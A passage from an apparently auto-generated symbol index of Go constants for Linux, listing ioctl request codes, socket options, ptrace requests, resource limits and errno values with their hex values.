PERF_EVENT_IOC_SET_BPF (line 194) | PERF_EVENT_IOC_SET_BPF = 0x80042408 constant PERF_EVENT_IOC_SET_FILTER (line 195) | PERF_EVENT_IOC_SET_FILTER = 0x80082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 196) | PERF_EVENT_IOC_SET_OUTPUT = 0x20002405 constant PPPIOCATTACH (line 197) | PPPIOCATTACH = 0x8004743d constant PPPIOCATTCHAN (line 198) | PPPIOCATTCHAN = 0x80047438 constant PPPIOCBRIDGECHAN (line 199) | PPPIOCBRIDGECHAN = 0x80047435 constant PPPIOCCONNECT (line 200) | PPPIOCCONNECT = 0x8004743a constant PPPIOCDETACH (line 201) | PPPIOCDETACH = 0x8004743c constant PPPIOCDISCONN (line 202) | PPPIOCDISCONN = 0x20007439 constant PPPIOCGASYNCMAP (line 203) | PPPIOCGASYNCMAP = 0x40047458 constant PPPIOCGCHAN (line 204) | PPPIOCGCHAN = 0x40047437 constant PPPIOCGDEBUG (line 205) | PPPIOCGDEBUG = 0x40047441 constant PPPIOCGFLAGS (line 206) | PPPIOCGFLAGS = 0x4004745a constant PPPIOCGIDLE (line 207) | PPPIOCGIDLE = 0x4010743f constant PPPIOCGIDLE32 (line 208) | PPPIOCGIDLE32 = 0x4008743f constant PPPIOCGIDLE64 (line 209) | PPPIOCGIDLE64 = 0x4010743f constant PPPIOCGL2TPSTATS (line 210) | PPPIOCGL2TPSTATS = 0x40487436 constant PPPIOCGMRU (line 211) | PPPIOCGMRU = 0x40047453 constant PPPIOCGRASYNCMAP (line 212) | PPPIOCGRASYNCMAP = 0x40047455 constant PPPIOCGUNIT (line 213) | PPPIOCGUNIT = 0x40047456 constant PPPIOCGXASYNCMAP (line 214) | PPPIOCGXASYNCMAP = 0x40207450 constant PPPIOCSACTIVE (line 215) | PPPIOCSACTIVE = 0x80107446 constant PPPIOCSASYNCMAP (line 216) | PPPIOCSASYNCMAP = 0x80047457 constant PPPIOCSCOMPRESS (line 217) | PPPIOCSCOMPRESS = 0x8010744d constant PPPIOCSDEBUG (line 218) | PPPIOCSDEBUG = 0x80047440 constant PPPIOCSFLAGS (line 219) | PPPIOCSFLAGS = 0x80047459 constant PPPIOCSMAXCID (line 220) | PPPIOCSMAXCID = 0x80047451 constant PPPIOCSMRRU (line 221) | PPPIOCSMRRU = 0x8004743b constant PPPIOCSMRU (line 222) | PPPIOCSMRU = 0x80047452 constant PPPIOCSNPMODE (line 223) | PPPIOCSNPMODE = 0x8008744b constant PPPIOCSPASS (line 224) | PPPIOCSPASS = 0x80107447 constant PPPIOCSRASYNCMAP (line 225) | PPPIOCSRASYNCMAP = 0x80047454 constant PPPIOCSXASYNCMAP (line 226) | PPPIOCSXASYNCMAP = 0x8020744f constant PPPIOCUNBRIDGECHAN (line 227) | PPPIOCUNBRIDGECHAN = 0x20007434 constant PPPIOCXFERUNIT (line 228) | PPPIOCXFERUNIT = 0x2000744e constant PR_SET_PTRACER_ANY (line 229) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_GETFPREGS (line 230) | PTRACE_GETFPREGS = 0xe constant PTRACE_GET_THREAD_AREA (line 231) | PTRACE_GET_THREAD_AREA = 0x19 constant PTRACE_GET_THREAD_AREA_3264 (line 232) | PTRACE_GET_THREAD_AREA_3264 = 0xc4 constant PTRACE_GET_WATCH_REGS (line 233) | PTRACE_GET_WATCH_REGS = 0xd0 constant PTRACE_OLDSETOPTIONS (line 234) | PTRACE_OLDSETOPTIONS = 0x15 constant PTRACE_PEEKDATA_3264 (line 235) | PTRACE_PEEKDATA_3264 = 0xc1 constant PTRACE_PEEKTEXT_3264 (line 236) | PTRACE_PEEKTEXT_3264 = 0xc0 constant PTRACE_POKEDATA_3264 (line 237) | PTRACE_POKEDATA_3264 = 0xc3 constant PTRACE_POKETEXT_3264 (line 238) | PTRACE_POKETEXT_3264 = 0xc2 constant PTRACE_SETFPREGS (line 239) | PTRACE_SETFPREGS = 0xf constant PTRACE_SET_THREAD_AREA (line 240) | PTRACE_SET_THREAD_AREA = 0x1a constant PTRACE_SET_WATCH_REGS (line 241) | PTRACE_SET_WATCH_REGS = 0xd1 constant RLIMIT_AS (line 242) | RLIMIT_AS = 0x6 constant RLIMIT_MEMLOCK (line 243) | RLIMIT_MEMLOCK = 0x9 constant RLIMIT_NOFILE (line 244) | RLIMIT_NOFILE = 0x5 constant RLIMIT_NPROC (line 245) | RLIMIT_NPROC = 0x8 constant RLIMIT_RSS (line 246) | RLIMIT_RSS = 0x7 constant RNDADDENTROPY (line 247) | RNDADDENTROPY = 0x80085203 constant RNDADDTOENTCNT (line 248) | RNDADDTOENTCNT = 0x80045201 constant RNDCLEARPOOL (line 249) | RNDCLEARPOOL = 0x20005206 constant RNDGETENTCNT (line 250) | RNDGETENTCNT = 0x40045200 constant RNDGETPOOL (line 251) | RNDGETPOOL = 0x40085202 constant RNDRESEEDCRNG (line 252) | RNDRESEEDCRNG = 0x20005207 constant RNDZAPENTCNT (line 253) | RNDZAPENTCNT = 0x20005204 constant RTC_AIE_OFF (line 254) | RTC_AIE_OFF = 0x20007002 constant RTC_AIE_ON (line 255) | RTC_AIE_ON = 0x20007001 constant RTC_ALM_READ (line 256) | RTC_ALM_READ = 0x40247008 constant RTC_ALM_SET (line 257) | RTC_ALM_SET = 0x80247007 constant RTC_EPOCH_READ (line 258) | RTC_EPOCH_READ = 0x4008700d constant RTC_EPOCH_SET (line 259) | RTC_EPOCH_SET = 0x8008700e constant RTC_IRQP_READ (line 260) | RTC_IRQP_READ = 0x4008700b constant RTC_IRQP_SET (line 261) | RTC_IRQP_SET = 0x8008700c constant RTC_PARAM_GET (line 262) | RTC_PARAM_GET = 0x80187013 constant RTC_PARAM_SET (line 263) | RTC_PARAM_SET = 0x80187014 constant RTC_PIE_OFF (line 264) | RTC_PIE_OFF = 0x20007006 constant RTC_PIE_ON (line 265) | RTC_PIE_ON = 0x20007005 constant RTC_PLL_GET (line 266) | RTC_PLL_GET = 0x40207011 constant RTC_PLL_SET (line 267) | RTC_PLL_SET = 0x80207012 constant RTC_RD_TIME (line 268) | RTC_RD_TIME = 0x40247009 constant RTC_SET_TIME (line 269) | RTC_SET_TIME = 0x8024700a constant RTC_UIE_OFF (line 270) | RTC_UIE_OFF = 0x20007004 constant RTC_UIE_ON (line 271) | RTC_UIE_ON = 0x20007003 constant RTC_VL_CLR (line 272) | RTC_VL_CLR = 0x20007014 constant RTC_VL_READ (line 273) | RTC_VL_READ = 0x40047013 constant RTC_WIE_OFF (line 274) | RTC_WIE_OFF = 0x20007010 constant RTC_WIE_ON (line 275) | RTC_WIE_ON = 0x2000700f constant RTC_WKALM_RD (line 276) | RTC_WKALM_RD = 0x40287010 constant RTC_WKALM_SET (line 277) | RTC_WKALM_SET = 0x8028700f constant SCM_TIMESTAMPING (line 278) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 279) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 280) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 281) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 282) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 283) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 284) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x80182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 285) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x80082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 286) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x80082104 constant SFD_CLOEXEC (line 287) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 288) | SFD_NONBLOCK = 0x80 constant SIOCATMARK (line 289) | SIOCATMARK = 0x40047307 constant SIOCGPGRP (line 290) | SIOCGPGRP = 0x40047309 constant SIOCGSTAMPNS_NEW (line 291) | SIOCGSTAMPNS_NEW = 0x40108907 constant SIOCGSTAMP_NEW (line 292) | SIOCGSTAMP_NEW = 0x40108906 constant SIOCINQ (line 293) | SIOCINQ = 0x467f constant SIOCOUTQ (line 294) | SIOCOUTQ = 0x7472 constant SIOCSPGRP (line 295) | SIOCSPGRP = 0x80047308 constant SOCK_CLOEXEC (line 296) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 297) | SOCK_DGRAM = 0x1 constant SOCK_NONBLOCK (line 298) | SOCK_NONBLOCK = 0x80 constant SOCK_STREAM (line 299) | SOCK_STREAM = 0x2 constant SOL_SOCKET (line 300) | SOL_SOCKET = 0xffff constant SO_ACCEPTCONN (line 301) | SO_ACCEPTCONN = 0x1009 constant SO_ATTACH_BPF (line 302) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 303) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 304) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 305) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 306) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 307) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 308) | SO_BROADCAST = 0x20 constant SO_BSDCOMPAT (line 309) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 310) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 311) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 312) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 313) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 314) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 315) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 316) | SO_DOMAIN = 0x1029 constant SO_DONTROUTE (line 317) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 318) | SO_ERROR = 0x1007 constant SO_INCOMING_CPU (line 319) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 320) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 321) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 322) | SO_LINGER = 0x80 constant SO_LOCK_FILTER (line 323) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 324) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 325) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 326) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 327) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 328) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 329) | SO_OOBINLINE = 0x100 constant SO_PASSCRED (line 330) | SO_PASSCRED = 0x11 constant SO_PASSPIDFD (line 331) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 332) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 333) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 334) | SO_PEERCRED = 0x12 constant SO_PEERGROUPS (line 335) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 336) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 337) | SO_PEERSEC = 0x1e constant SO_PREFER_BUSY_POLL (line 338) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 339) | SO_PROTOCOL = 0x1028 constant SO_RCVBUF (line 340) | SO_RCVBUF = 0x1002 constant SO_RCVBUFFORCE (line 341) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 342) | SO_RCVLOWAT = 0x1004 constant SO_RCVMARK (line 343) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 344) | SO_RCVTIMEO = 0x1006 constant SO_RCVTIMEO_NEW (line 345) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 346) | SO_RCVTIMEO_OLD = 0x1006 constant SO_RESERVE_MEM (line 347) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 348) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 349) | SO_REUSEPORT = 0x200 constant SO_RXQ_OVFL (line 350) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 351) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 352) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 353) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 354) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 355) | SO_SNDBUF = 0x1001 constant SO_SNDBUFFORCE (line 356) | SO_SNDBUFFORCE = 0x1f constant SO_SNDLOWAT (line 357) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 358) | SO_SNDTIMEO = 0x1005 constant SO_SNDTIMEO_NEW (line 359) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 360) | SO_SNDTIMEO_OLD = 0x1005 constant SO_STYLE (line 361) | SO_STYLE = 0x1008 constant SO_TIMESTAMPING (line 362) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 363) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 364) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 365) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 366) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 367) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 368) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 369) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 370) | SO_TXTIME = 0x3d constant SO_TYPE (line 371) | SO_TYPE = 0x1008 constant SO_WIFI_STATUS (line 372) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 373) | SO_ZEROCOPY = 0x3c constant TAB1 (line 374) | TAB1 = 0x800 constant TAB2 (line 375) | TAB2 = 0x1000 constant TAB3 (line 376) | TAB3 = 0x1800 constant TABDLY (line 377) | TABDLY = 0x1800 constant TCFLSH (line 378) | TCFLSH = 0x5407 constant TCGETA (line 379) | TCGETA = 0x5401 constant TCGETS (line 380) | TCGETS = 0x540d constant TCGETS2 (line 381) | TCGETS2 = 0x4030542a constant TCSAFLUSH (line 382) | TCSAFLUSH = 0x5410 constant TCSBRK (line 383) | TCSBRK = 0x5405 constant TCSBRKP (line 384) | TCSBRKP = 0x5486 constant TCSETA (line 385) | TCSETA = 0x5402 constant TCSETAF (line 386) | TCSETAF = 0x5404 constant TCSETAW (line 387) | TCSETAW = 0x5403 constant TCSETS (line 388) | TCSETS = 0x540e constant TCSETS2 (line 389) | TCSETS2 = 0x8030542b constant TCSETSF (line 390) | TCSETSF = 0x5410 constant TCSETSF2 (line 391) | TCSETSF2 = 0x8030542d constant TCSETSW (line 392) | TCSETSW = 0x540f constant TCSETSW2 (line 393) | TCSETSW2 = 0x8030542c constant TCXONC (line 394) | TCXONC = 0x5406 constant TFD_CLOEXEC (line 395) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 396) | TFD_NONBLOCK = 0x80 constant TIOCCBRK (line 397) | TIOCCBRK = 0x5428 constant TIOCCONS (line 398) | TIOCCONS = 0x80047478 constant TIOCEXCL (line 399) | TIOCEXCL = 0x740d constant TIOCGDEV (line 400) | TIOCGDEV = 0x40045432 constant TIOCGETD (line 401) | TIOCGETD = 0x7400 constant TIOCGETP (line 402) | TIOCGETP = 0x7408 constant TIOCGEXCL (line 403) | TIOCGEXCL = 0x40045440 constant TIOCGICOUNT (line 404) | TIOCGICOUNT = 0x5492 constant TIOCGISO7816 (line 405) | TIOCGISO7816 = 0x40285442 constant TIOCGLCKTRMIOS (line 406) | TIOCGLCKTRMIOS = 0x548b constant TIOCGLTC (line 407) | TIOCGLTC = 0x7474 constant TIOCGPGRP (line 408) | TIOCGPGRP = 0x40047477 constant TIOCGPKT (line 409) | TIOCGPKT = 0x40045438 constant TIOCGPTLCK (line 410) | TIOCGPTLCK = 0x40045439 constant TIOCGPTN (line 411) | TIOCGPTN = 0x40045430 constant TIOCGPTPEER (line 412) | TIOCGPTPEER = 0x20005441 constant TIOCGRS485 (line 413) | TIOCGRS485 = 0x4020542e constant TIOCGSERIAL (line 414) | TIOCGSERIAL = 0x5484 constant TIOCGSID (line 415) | TIOCGSID = 0x7416 constant TIOCGSOFTCAR (line 416) | TIOCGSOFTCAR = 0x5481 constant TIOCGWINSZ (line 417) | TIOCGWINSZ = 0x40087468 constant TIOCINQ (line 418) | TIOCINQ = 0x467f constant TIOCLINUX (line 419) | TIOCLINUX = 0x5483 constant TIOCMBIC (line 420) | TIOCMBIC = 0x741c constant TIOCMBIS (line 421) | TIOCMBIS = 0x741b constant TIOCMGET (line 422) | TIOCMGET = 0x741d constant TIOCMIWAIT (line 423) | TIOCMIWAIT = 0x5491 constant TIOCMSET (line 424) | TIOCMSET = 0x741a constant TIOCM_CAR (line 425) | TIOCM_CAR = 0x100 constant TIOCM_CD (line 426) | TIOCM_CD = 0x100 constant TIOCM_CTS (line 427) | TIOCM_CTS = 0x40 constant TIOCM_DSR (line 428) | TIOCM_DSR = 0x400 constant TIOCM_RI (line 429) | TIOCM_RI = 0x200 constant TIOCM_RNG (line 430) | TIOCM_RNG = 0x200 constant TIOCM_SR (line 431) | TIOCM_SR = 0x20 constant TIOCM_ST (line 432) | TIOCM_ST = 0x10 constant TIOCNOTTY (line 433) | TIOCNOTTY = 0x5471 constant TIOCNXCL (line 434) | TIOCNXCL = 0x740e constant TIOCOUTQ (line 435) | TIOCOUTQ = 0x7472 constant TIOCPKT (line 436) | TIOCPKT = 0x5470 constant TIOCSBRK (line 437) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 438) | TIOCSCTTY = 0x5480 constant TIOCSERCONFIG (line 439) | TIOCSERCONFIG = 0x5488 constant TIOCSERGETLSR (line 440) | TIOCSERGETLSR = 0x548e constant TIOCSERGETMULTI (line 441) | TIOCSERGETMULTI = 0x548f constant TIOCSERGSTRUCT (line 442) | TIOCSERGSTRUCT = 0x548d constant TIOCSERGWILD (line 443) | TIOCSERGWILD = 0x5489 constant TIOCSERSETMULTI (line 444) | TIOCSERSETMULTI = 0x5490 constant TIOCSERSWILD (line 445) | TIOCSERSWILD = 0x548a constant TIOCSER_TEMT (line 446) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 447) | TIOCSETD = 0x7401 constant TIOCSETN (line 448) | TIOCSETN = 0x740a constant TIOCSETP (line 449) | TIOCSETP = 0x7409 constant TIOCSIG (line 450) | TIOCSIG = 0x80045436 constant TIOCSISO7816 (line 451) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 452) | TIOCSLCKTRMIOS = 0x548c constant TIOCSLTC (line 453) | TIOCSLTC = 0x7475 constant TIOCSPGRP (line 454) | TIOCSPGRP = 0x80047476 constant TIOCSPTLCK (line 455) | TIOCSPTLCK = 0x80045431 constant TIOCSRS485 (line 456) | TIOCSRS485 = 0xc020542f constant TIOCSSERIAL (line 457) | TIOCSSERIAL = 0x5485 constant TIOCSSOFTCAR (line 458) | TIOCSSOFTCAR = 0x5482 constant TIOCSTI (line 459) | TIOCSTI = 0x5472 constant TIOCSWINSZ (line 460) | TIOCSWINSZ = 0x80087467 constant TIOCVHANGUP (line 461) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 462) | TOSTOP = 0x8000 constant TUNATTACHFILTER (line 463) | TUNATTACHFILTER = 0x801054d5 constant TUNDETACHFILTER (line 464) | TUNDETACHFILTER = 0x801054d6 constant TUNGETDEVNETNS (line 465) | TUNGETDEVNETNS = 0x200054e3 constant TUNGETFEATURES (line 466) | TUNGETFEATURES = 0x400454cf constant TUNGETFILTER (line 467) | TUNGETFILTER = 0x401054db constant TUNGETIFF (line 468) | TUNGETIFF = 0x400454d2 constant TUNGETSNDBUF (line 469) | TUNGETSNDBUF = 0x400454d3 constant TUNGETVNETBE (line 470) | TUNGETVNETBE = 0x400454df constant TUNGETVNETHDRSZ (line 471) | TUNGETVNETHDRSZ = 0x400454d7 constant TUNGETVNETLE (line 472) | TUNGETVNETLE = 0x400454dd constant TUNSETCARRIER (line 473) | TUNSETCARRIER = 0x800454e2 constant TUNSETDEBUG (line 474) | TUNSETDEBUG = 0x800454c9 constant TUNSETFILTEREBPF (line 475) | TUNSETFILTEREBPF = 0x400454e1 constant TUNSETGROUP (line 476) | TUNSETGROUP = 0x800454ce constant TUNSETIFF (line 477) | TUNSETIFF = 0x800454ca constant TUNSETIFINDEX (line 478) | TUNSETIFINDEX = 0x800454da constant TUNSETLINK (line 479) | TUNSETLINK = 0x800454cd constant TUNSETNOCSUM (line 480) | TUNSETNOCSUM = 0x800454c8 constant TUNSETOFFLOAD (line 481) | TUNSETOFFLOAD = 0x800454d0 constant TUNSETOWNER (line 482) | TUNSETOWNER = 0x800454cc constant TUNSETPERSIST (line 483) | TUNSETPERSIST = 0x800454cb constant TUNSETQUEUE (line 484) | TUNSETQUEUE = 0x800454d9 constant TUNSETSNDBUF (line 485) | TUNSETSNDBUF = 0x800454d4 constant TUNSETSTEERINGEBPF (line 486) | TUNSETSTEERINGEBPF = 0x400454e0 constant TUNSETTXFILTER (line 487) | TUNSETTXFILTER = 0x800454d1 constant TUNSETVNETBE (line 488) | TUNSETVNETBE = 0x800454de constant TUNSETVNETHDRSZ (line 489) | TUNSETVNETHDRSZ = 0x800454d8 constant TUNSETVNETLE (line 490) | TUNSETVNETLE = 0x800454dc constant UBI_IOCATT (line 491) | UBI_IOCATT = 0x80186f40 constant UBI_IOCDET (line 492) | UBI_IOCDET = 0x80046f41 constant UBI_IOCEBCH (line 493) | UBI_IOCEBCH = 0x80044f02 constant UBI_IOCEBER (line 494) | UBI_IOCEBER = 0x80044f01 constant UBI_IOCEBISMAP (line 495) | UBI_IOCEBISMAP = 0x40044f05 constant UBI_IOCEBMAP (line 496) | UBI_IOCEBMAP = 0x80084f03 constant UBI_IOCEBUNMAP (line 497) | UBI_IOCEBUNMAP = 0x80044f04 constant UBI_IOCMKVOL (line 498) | UBI_IOCMKVOL = 0x80986f00 constant UBI_IOCRMVOL (line 499) | UBI_IOCRMVOL = 0x80046f01 constant UBI_IOCRNVOL (line 500) | UBI_IOCRNVOL = 0x91106f03 constant UBI_IOCRPEB (line 501) | UBI_IOCRPEB = 0x80046f04 constant UBI_IOCRSVOL (line 502) | UBI_IOCRSVOL = 0x800c6f02 constant UBI_IOCSETVOLPROP (line 503) | UBI_IOCSETVOLPROP = 0x80104f06 constant UBI_IOCSPEB (line 504) | UBI_IOCSPEB = 0x80046f05 constant UBI_IOCVOLCRBLK (line 505) | UBI_IOCVOLCRBLK = 0x80804f07 constant UBI_IOCVOLRMBLK (line 506) | UBI_IOCVOLRMBLK = 0x20004f08 constant UBI_IOCVOLUP (line 507) | UBI_IOCVOLUP = 0x80084f00 constant VDISCARD (line 508) | VDISCARD = 0xd constant VEOF (line 509) | VEOF = 0x10 constant VEOL (line 510) | VEOL = 0x11 constant VEOL2 (line 511) | VEOL2 = 0x6 constant VMIN (line 512) | VMIN = 0x4 constant VREPRINT (line 513) | VREPRINT = 0xc constant VSTART (line 514) | VSTART = 0x8 constant VSTOP (line 515) | VSTOP = 0x9 constant VSUSP (line 516) | VSUSP = 0xa constant VSWTC (line 517) | VSWTC = 0x7 constant VSWTCH (line 518) | VSWTCH = 0x7 constant VT1 (line 519) | VT1 = 0x4000 constant VTDLY (line 520) | VTDLY = 0x4000 constant VTIME (line 521) | VTIME = 0x5 constant VWERASE (line 522) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 523) | WDIOC_GETBOOTSTATUS = 0x40045702 constant WDIOC_GETPRETIMEOUT (line 524) | WDIOC_GETPRETIMEOUT = 0x40045709 constant WDIOC_GETSTATUS (line 525) | WDIOC_GETSTATUS = 0x40045701 constant WDIOC_GETSUPPORT (line 526) | WDIOC_GETSUPPORT = 0x40285700 constant WDIOC_GETTEMP (line 527) | WDIOC_GETTEMP = 0x40045703 constant WDIOC_GETTIMELEFT (line 528) | WDIOC_GETTIMELEFT = 0x4004570a constant WDIOC_GETTIMEOUT (line 529) | WDIOC_GETTIMEOUT = 0x40045707 constant WDIOC_KEEPALIVE (line 530) | WDIOC_KEEPALIVE = 0x40045705 constant WDIOC_SETOPTIONS (line 531) | WDIOC_SETOPTIONS = 0x40045704 constant WORDSIZE (line 532) | WORDSIZE = 0x40 constant XCASE (line 533) | XCASE = 0x4 constant XTABS (line 534) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 535) | _HIDIOCGRAWNAME = 0x40804804 constant _HIDIOCGRAWPHYS (line 536) | _HIDIOCGRAWPHYS = 0x40404805 constant _HIDIOCGRAWUNIQ (line 537) | _HIDIOCGRAWUNIQ = 0x40404808 constant EADDRINUSE (line 542) | EADDRINUSE = syscall.Errno(0x7d) constant EADDRNOTAVAIL (line 543) | EADDRNOTAVAIL = syscall.Errno(0x7e) constant EADV (line 544) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 545) | EAFNOSUPPORT = syscall.Errno(0x7c) constant EALREADY (line 546) | EALREADY = syscall.Errno(0x95) constant EBADE (line 547) | EBADE = syscall.Errno(0x32) constant EBADFD (line 548) | EBADFD = syscall.Errno(0x51) constant EBADMSG (line 549) | EBADMSG = syscall.Errno(0x4d) constant EBADR (line 550) | EBADR = syscall.Errno(0x33) constant EBADRQC (line 551) | EBADRQC = syscall.Errno(0x36) constant EBADSLT (line 552) | EBADSLT = syscall.Errno(0x37) constant EBFONT (line 553) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 554) | ECANCELED = syscall.Errno(0x9e) constant ECHRNG (line 555) | ECHRNG = syscall.Errno(0x25) constant ECOMM (line 556) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 557) | ECONNABORTED = syscall.Errno(0x82) constant ECONNREFUSED (line 558) | ECONNREFUSED = syscall.Errno(0x92) constant ECONNRESET (line 559) | ECONNRESET = syscall.Errno(0x83) constant EDEADLK (line 560) | EDEADLK = syscall.Errno(0x2d) constant EDEADLOCK (line 561) | EDEADLOCK = syscall.Errno(0x38) constant EDESTADDRREQ (line 562) | EDESTADDRREQ = syscall.Errno(0x60) constant EDOTDOT (line 563) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 564) | EDQUOT = syscall.Errno(0x46d) constant EHOSTDOWN (line 565) | EHOSTDOWN = syscall.Errno(0x93) constant EHOSTUNREACH (line 566) | EHOSTUNREACH = syscall.Errno(0x94) constant EHWPOISON (line 567) | EHWPOISON = syscall.Errno(0xa8) constant EIDRM (line 568) | EIDRM = syscall.Errno(0x24) constant EILSEQ (line 569) | EILSEQ = syscall.Errno(0x58) constant EINIT (line 570) | EINIT = syscall.Errno(0x8d) constant EINPROGRESS (line 571) | EINPROGRESS = syscall.Errno(0x96) constant EISCONN (line 572) | EISCONN = syscall.Errno(0x85) constant EISNAM (line 573) | EISNAM = syscall.Errno(0x8b) constant EKEYEXPIRED (line 574) | EKEYEXPIRED = syscall.Errno(0xa2) constant EKEYREJECTED (line 575) | EKEYREJECTED = syscall.Errno(0xa4) constant EKEYREVOKED (line 576) | EKEYREVOKED = syscall.Errno(0xa3) constant EL2HLT (line 577) | EL2HLT = syscall.Errno(0x2c) constant EL2NSYNC (line 578) | EL2NSYNC = syscall.Errno(0x26) constant EL3HLT (line 579) | EL3HLT = syscall.Errno(0x27) constant EL3RST (line 580) | EL3RST = syscall.Errno(0x28) constant ELIBACC (line 581) | ELIBACC = syscall.Errno(0x53) constant ELIBBAD (line 582) | ELIBBAD = syscall.Errno(0x54) constant ELIBEXEC (line 583) | ELIBEXEC = syscall.Errno(0x57) constant ELIBMAX (line 584) | ELIBMAX = syscall.Errno(0x56) constant ELIBSCN (line 585) | ELIBSCN = syscall.Errno(0x55) constant ELNRNG (line 586) | ELNRNG = syscall.Errno(0x29) constant ELOOP (line 587) | ELOOP = syscall.Errno(0x5a) constant EMEDIUMTYPE (line 588) | EMEDIUMTYPE = syscall.Errno(0xa0) constant EMSGSIZE (line 589) | EMSGSIZE = syscall.Errno(0x61) constant EMULTIHOP (line 590) | EMULTIHOP = syscall.Errno(0x4a) constant ENAMETOOLONG (line 591) | ENAMETOOLONG = syscall.Errno(0x4e) constant ENAVAIL (line 592) | ENAVAIL = syscall.Errno(0x8a) constant ENETDOWN (line 593) | ENETDOWN = syscall.Errno(0x7f) constant ENETRESET (line 594) | ENETRESET = syscall.Errno(0x81) constant ENETUNREACH (line 595) | ENETUNREACH = syscall.Errno(0x80) constant ENOANO (line 596) | ENOANO = syscall.Errno(0x35) constant ENOBUFS (line 597) | ENOBUFS = syscall.Errno(0x84) constant ENOCSI (line 598) | ENOCSI = syscall.Errno(0x2b) constant ENODATA (line 599) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 600) | ENOKEY = syscall.Errno(0xa1) constant ENOLCK (line 601) | ENOLCK = syscall.Errno(0x2e) constant ENOLINK (line 602) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 603) | ENOMEDIUM = syscall.Errno(0x9f) constant ENOMSG (line 604) | ENOMSG = syscall.Errno(0x23) constant ENONET 